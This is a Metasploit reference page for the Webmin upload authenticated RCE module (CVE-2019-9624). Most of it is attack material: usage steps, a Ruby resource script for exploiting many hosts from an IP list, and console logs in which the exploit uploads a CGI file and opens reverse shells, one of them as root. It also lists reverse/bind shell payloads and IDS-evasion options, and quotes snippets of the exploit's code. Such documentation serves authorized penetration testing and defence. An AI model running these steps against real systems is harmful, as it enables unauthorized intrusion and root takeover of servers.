Webmin Upload Authenticated RCE - Metasploit


This page contains detailed information about how to use the exploit/unix/webapp/webmin_upload_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Webmin Upload Authenticated RCE
Module: exploit/unix/webapp/webmin_upload_exec
Source code: modules/exploits/unix/webapp/webmin_upload_exec.rb
Disclosure date: 2019-01-17
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 10000
List of CVEs: CVE-2019-9624

This module exploits an arbitrary command execution vulnerability in Webmin 1.900 and lower versions. Any user authorized to the "Upload and Download" module can execute arbitrary commands with root privileges. In addition, if the 'Running Processes' (proc) privilege is set the user can accurately determine which directory to upload to. Webmin application files can be written/overwritten, which allows remote code execution. The module has been tested successfully with Webmin 1.900 on Ubuntu v18.04. Using GUESSUPLOAD attempts to use a default installation path in order to trigger the exploit.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using webmin_upload_exec against a single host

Normally, you can use exploit/unix/webapp/webmin_upload_exec this way:

msf > use exploit/unix/webapp/webmin_upload_exec
msf exploit(webmin_upload_exec) > show targets
    ... a list of targets ...
msf exploit(webmin_upload_exec) > set TARGET target-id
msf exploit(webmin_upload_exec) > show options
    ... show and set options ...
msf exploit(webmin_upload_exec) > exploit

Using webmin_upload_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your webmin_upload_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/webapp/webmin_upload_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • USERNAME: Webmin Username

  • PASSWORD: Webmin Password

Knowledge Base


Description


This module exploits an arbitrary command execution vulnerability in Webmin 1.900 and lower versions. Any user authorized to the "Upload and Download" module can execute arbitrary commands with root privileges. In addition, if the 'Running Processes' (proc) privilege is set the user can accurately determine which directory to upload to. Webmin application files can be written/overwritten, which allows remote code execution. The module has been tested successfully with Webmin 1.900.

Vulnerable Application


This module has been tested with Webmin 1.900

Options


GUESSUPLOAD

Use default installation path /usr/share/webmin/

Verification Steps


  1. use exploit/unix/webapp/webmin_upload_exec
  2. set rhosts <rhost>
  3. set username <username>
  4. set password <password>
  5. exploit

Scenarios


Tested Webmin 1.900 on Ubuntu 18.04 x64

msf5 > use exploit/unix/webapp/webmin_upload_exec
msf5 exploit(unix/webapp/webmin_upload_exec) > set rhosts 172.22.222.154
rhosts => 172.22.222.154
msf5 exploit(unix/webapp/webmin_upload_exec) > set username unixuser
username => unixuser
msf5 exploit(unix/webapp/webmin_upload_exec) > set password unixuser
password => unixuser
msf5 exploit(unix/webapp/webmin_upload_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[+] Session cookie: 6215747dab393701e0acbb9ac5b7c699
[*] Target URL => https://172.22.222.154:10000
[*] Searching for directory to upload...
[-] Failed to determine webmin share directory
[-] Set GUESSUPLOAD to attempt upload to a default location
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/webmin_upload_exec) > set guessupload true
guessupload => true
msf5 exploit(unix/webapp/webmin_upload_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[+] Session cookie: 46cbd354e4532fe55d1a462db128905c
[*] Target URL => https://172.22.222.154:10000
[*] Searching for directory to upload...
[!] Could not determine upload directory. Using /usr/share/webmin/
[+] File gxvgsiji.cgi was successfully uploaded.
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.154:38960) at 2019-03-14 13:40:56 -0500
[+] Deleted gxvgsiji.cgi

uname -a 
Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
whoami
root
exit

Go back to menu.

Msfconsole Usage


Here is how the unix/webapp/webmin_upload_exec exploit module looks in the msfconsole:

msf6 > use exploit/unix/webapp/webmin_upload_exec

msf6 exploit(unix/webapp/webmin_upload_exec) > show info

       Name: Webmin Upload Authenticated RCE
     Module: exploit/unix/webapp/webmin_upload_exec
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-01-17

Provided by:
  AkkuS <��zkan Mustafa Akku��>
  Ziconius <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Webmin <= 1.900

Check supported:
  Yes

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  FILENAME                      no        Filename used for the uploaded data
  GUESSUPLOAD  false            yes       If no "proc" permissions exists use default path.
  PASSWORD                      yes       Webmin Password
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT        10000            yes       The target port (TCP)
  SSL          true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Base path for Webmin application
  USERNAME                      yes       Webmin Username
  VHOST                         no        HTTP server virtual host

Payload information:
  Space: 512

Description:
  This module exploits an arbitrary command execution vulnerability in 
  Webmin 1.900 and lower versions. Any user authorized to the "Upload 
  and Download" module can execute arbitrary commands with root 
  privileges. In addition, if the 'Running Processes' (proc) privilege 
  is set the user can accurately determine which directory to upload 
  to. Webmin application files can be written/overwritten, which 
  allows remote code execution. The module has been tested 
  successfully with Webmin 1.900 on Ubuntu v18.04. Using GUESSUPLOAD 
  attempts to use a default installation path in order to trigger the 
  exploit.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-9624
  https://www.exploit-db.com/exploits/46201
  https://pentest.com.tr/exploits/Webmin-1900-Remote-Command-Execution.html

Module Options


This is a complete list of options available in the unix/webapp/webmin_upload_exec exploit:

msf6 exploit(unix/webapp/webmin_upload_exec) > show options

Module options (exploit/unix/webapp/webmin_upload_exec):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILENAME                      no        Filename used for the uploaded data
   GUESSUPLOAD  false            yes       If no "proc" permissions exists use default path.
   PASSWORD                      yes       Webmin Password
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        10000            yes       The target port (TCP)
   SSL          true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Base path for Webmin application
   USERNAME                      yes       Webmin Username
   VHOST                         no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.900

Advanced Options


Here is a complete list of advanced options supported by the unix/webapp/webmin_upload_exec exploit:

msf6 exploit(unix/webapp/webmin_upload_exec) > show advanced

Module advanced options (exploit/unix/webapp/webmin_upload_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/webapp/webmin_upload_exec module can exploit:

msf6 exploit(unix/webapp/webmin_upload_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Webmin <= 1.900

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/webapp/webmin_upload_exec exploit:

msf6 exploit(unix/webapp/webmin_upload_exec) > show payloads

Compatible Payloads
===================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  payload/cmd/unix/bind_perl                          normal  No     Unix Command Shell, Bind TCP (via Perl)
   1  payload/cmd/unix/bind_perl_ipv6                     normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2  payload/cmd/unix/reverse_perl                       normal  No     Unix Command Shell, Reverse TCP (via Perl)
   3  payload/cmd/unix/reverse_perl_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via perl)

Evasion Options


Here is the full list of possible evasion options supported by the unix/webapp/webmin_upload_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/webapp/webmin_upload_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.


Here is a relevant code snippet related to the "Failed to retrieve session cookie" error message:

114:	  # Exploiting phase
115:	  ##
116:	  def exploit
117:	    cookie = login
118:	    if cookie == '' || cookie.nil?
119:	      fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
120:	    end
121:	    print_good("Session cookie: #{cookie}")
122:	
123:	    ##
124:	    # Directory and SSL verification for referer

Request failed


Here is a relevant code snippet related to the "Request failed" error message:

135:	          'Referer' => "#{phost}/sysinfo.cgi?xnavigation=1"
136:	        },
137:	      'cookie' => "redirect=1; testing=1; sid=#{cookie}"
138:	    )
139:	    unless res && res.code == 200
140:	      fail_with(Failure::Unknown, 'Request failed')
141:	    end
142:	
143:	    print_status 'Searching for directory to upload...'
144:	    if res.body =~ /Running Processes/ && res.body =~ /[^ ] ([\/\w]+)miniserv\.pl/
145:	      directory = $1

Could not determine upload directory. Using /usr/share/webmin/


Here is a relevant code snippet related to the "Could not determine upload directory. Using /usr/share/webmin/" error message:

142:	
143:	    print_status 'Searching for directory to upload...'
144:	    if res.body =~ /Running Processes/ && res.body =~ /[^ ] ([\/\w]+)miniserv\.pl/
145:	      directory = $1
146:	    elsif datastore['GUESSUPLOAD']
147:	      print_warning('Could not determine upload directory. Using /usr/share/webmin/')
148:	      directory = '/usr/share/webmin/'
149:	    else
150:	      print_error('Failed to determine webmin share directory')
151:	      print_error('Set GUESSUPLOAD to attempt upload to a default location')
152:	      return

Failed to determine webmin share directory


Here is a relevant code snippet related to the "Failed to determine webmin share directory" error message:

145:	      directory = $1
146:	    elsif datastore['GUESSUPLOAD']
147:	      print_warning('Could not determine upload directory. Using /usr/share/webmin/')
148:	      directory = '/usr/share/webmin/'
149:	    else
150:	      print_error('Failed to determine webmin share directory')
151:	      print_error('Set GUESSUPLOAD to attempt upload to a default location')
152:	      return
153:	    end
154:	    directory << 'file'
155:	    filename = datastore['FILENAME'].present? ? datastore['FILENAME'] : "#{rand_text_alpha_lower(5..8)}.cgi"

Set GUESSUPLOAD to attempt upload to a default location


Here is a relevant code snippet related to the "Set GUESSUPLOAD to attempt upload to a default location" error message:

146:	    elsif datastore['GUESSUPLOAD']
147:	      print_warning('Could not determine upload directory. Using /usr/share/webmin/')
148:	      directory = '/usr/share/webmin/'
149:	    else
150:	      print_error('Failed to determine webmin share directory')
151:	      print_error('Set GUESSUPLOAD to attempt upload to a default location')
152:	      return
153:	    end
154:	    directory << 'file'
155:	    filename = datastore['FILENAME'].present? ? datastore['FILENAME'] : "#{rand_text_alpha_lower(5..8)}.cgi"
156:	    filename << '.cgi' unless filename.end_with?('.cgi')

Upload failed.


Here is a relevant code snippet related to the "Upload failed." error message:

203:	    )
204:	
205:	    if res2 && res2.code == 200 && res2.body =~ /Saving file/
206:	      print_good "File #{filename} was successfully uploaded."
207:	      register_file_for_cleanup(filename)
208:	    else
209:	      print_error 'Upload failed.'
210:	      fail_with(Failure::UnexpectedReply, 'Failed to upload file')
211:	    end
212:	  end
213:	end

Failed to upload file


Here is a relevant code snippet related to the "Failed to upload file" error message:

203:	    )
204:	
205:	    if res2 && res2.code == 200 && res2.body =~ /Saving file/
206:	      print_good "File #{filename} was successfully uploaded."
207:	      register_file_for_cleanup(filename)
208:	    else
209:	      print_error 'Upload failed.'
210:	      fail_with(Failure::UnexpectedReply, 'Failed to upload file')
211:	    end
212:	  end
213:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • AkkuS <Özkan Mustafa AkkuÅŸ>
  • Ziconius <Kris.Anderson[at]immersivelabs.com>

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.